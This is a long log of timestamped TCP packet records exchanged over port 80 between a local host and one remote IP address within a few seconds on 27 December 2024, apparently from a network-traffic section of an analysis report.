                                    Dec 27, 2024 06:22:15.955363989 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.955476046 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.955526114 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.956353903 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.956461906 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.956516027 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.957364082 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.957465887 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.957529068 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.958359003 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.958405972 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.958465099 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.959367037 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.959439993 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.959491968 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.960354090 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.960479021 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.960531950 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.961349010 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.961455107 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.961512089 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.962331057 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.962456942 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.962517977 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.963331938 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.963438988 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.963495970 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.964349031 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.964476109 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.964533091 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.965325117 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.965440035 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.965527058 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.966347933 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.966453075 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.966507912 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.967328072 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.967380047 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.967432976 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.968314886 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.968419075 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.968472004 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.969310999 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.969374895 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.969425917 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.970310926 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.970412970 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.970460892 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.971282959 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.971405029 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.971457005 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.972291946 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.972400904 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.972449064 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.973288059 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.973398924 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.973521948 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.974281073 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.974405050 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.974456072 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.975290060 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.975435019 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.975488901 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.976289988 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.976382017 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.976447105 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.977281094 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.977406979 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.977467060 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.978265047 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.978379011 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.978521109 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.979275942 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.979393005 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.979443073 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.980314970 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.980417013 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.980487108 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.981291056 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.981395960 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.981447935 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.982270956 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.982368946 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.982512951 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.983258963 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.983375072 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.983438015 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.984260082 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.984363079 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.984416962 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.985249996 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.985366106 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.985429049 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.986243010 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.986362934 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.986413956 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.987251997 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.987373114 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.987458944 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.988234043 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.988353014 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.988416910 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.989243984 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.989360094 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.989413977 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.990226984 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.990339994 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:15.990391016 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:15.991194010 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.033351898 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.054929972 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.055054903 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.055155993 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.055428028 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.055499077 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.055563927 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.056413889 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.056555986 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.056627989 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.057406902 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.057521105 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.057573080 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.058397055 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.058522940 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.058576107 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.059420109 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.059519053 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.059572935 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.060405970 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.060537100 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.060590982 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.061392069 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.061502934 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.061553955 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.062376976 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.062488079 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.062535048 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.063399076 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.063497066 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.063545942 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.064395905 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.064588070 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.064646006 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.065370083 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.065495014 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.065543890 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.066395998 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.066469908 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.066574097 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.067370892 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.067487001 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.067532063 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.068360090 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.068473101 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.068522930 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.069365025 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.069470882 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.069540024 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.070363998 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.070594072 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.070647001 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.071350098 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.071476936 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.071530104 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.072094917 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.072213888 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.072264910 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.072855949 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.072882891 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.072937965 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.073604107 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.073714972 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.073788881 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.074342012 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.074469090 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.074517965 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.075078964 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.075212955 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.075303078 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.075838089 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.075923920 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.075969934 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.076569080 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.076693058 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.076740026 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.077372074 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.077502966 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.077554941 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.078083038 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.078145981 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.078221083 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.098248005 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.098351955 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.098412991 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.098597050 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.098727942 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.098787069 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.099337101 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.099447012 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.099512100 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.100054979 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.100161076 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.100209951 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.100800037 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.100841045 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.100887060 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.101535082 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.101641893 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.101706982 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.102233887 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.102355003 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.102404118 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.102957010 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.103070974 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.103142977 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.103694916 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.103796005 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.103866100 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.104382038 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.104495049 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.104543924 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.105081081 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.105243921 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.105303049 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.105793953 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.105940104 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.105998039 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.106487989 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.106594086 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.106638908 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.107172012 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.107270956 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.107426882 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.107878923 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.108069897 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.108125925 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.108566999 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.108680964 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.108735085 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.109227896 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.109344959 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.109400988 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.109970093 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.110035896 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.110120058 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.110600948 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.110711098 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.110759974 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.111272097 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.111376047 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.111442089 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.112137079 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.112247944 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.112317085 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.112601995 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.112718105 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.112766981 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.113290071 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.113385916 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.113445997 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.113938093 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.114049911 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.114099026 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.114620924 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.114737034 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.114783049 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.115274906 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.115401983 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.115459919 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.115963936 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.116043091 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.116091013 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.315843105 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.315892935 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.315964937 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.316004992 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.316046953 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.316111088 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.316689014 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.316807032 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.316914082 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.317351103 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.317462921 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.317557096 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.318033934 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.318135023 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.318197966 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.318691015 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.318819046 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.318979979 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.319353104 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.319466114 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.319706917 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.320049047 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.320173979 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.320379019 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.320697069 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.320813894 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.321304083 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.321351051 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.321464062 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.322045088 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.322140932 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.322165966 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.322266102 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.322715044 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.322829008 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.323014975 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.323395967 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.323515892 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.323616982 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.324048042 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.324168921 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.324707031 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.324805021 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.324841022 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.325187922 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.325381994 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.325488091 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.326037884 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.326144934 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.326148033 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.326248884 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.326710939 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.326834917 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.327383041 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.327491999 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.327545881 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.327668905 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.328044891 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.328154087 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.328387022 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.328720093 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.328835964 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.329102993 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.329391003 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.329504013 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.329629898 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:16.330058098 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.330127954 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:16.330287933 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:17.907387972 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:18.026913881 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:18.388911963 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:18.389417887 CET4973080192.168.2.4104.21.22.88
                                    Dec 27, 2024 06:22:18.508927107 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:18.721013069 CET8049730104.21.22.88192.168.2.4
                                    Dec 27, 2024 06:22:18.721103907 CET8049730104.21.22.88192.168.2.4
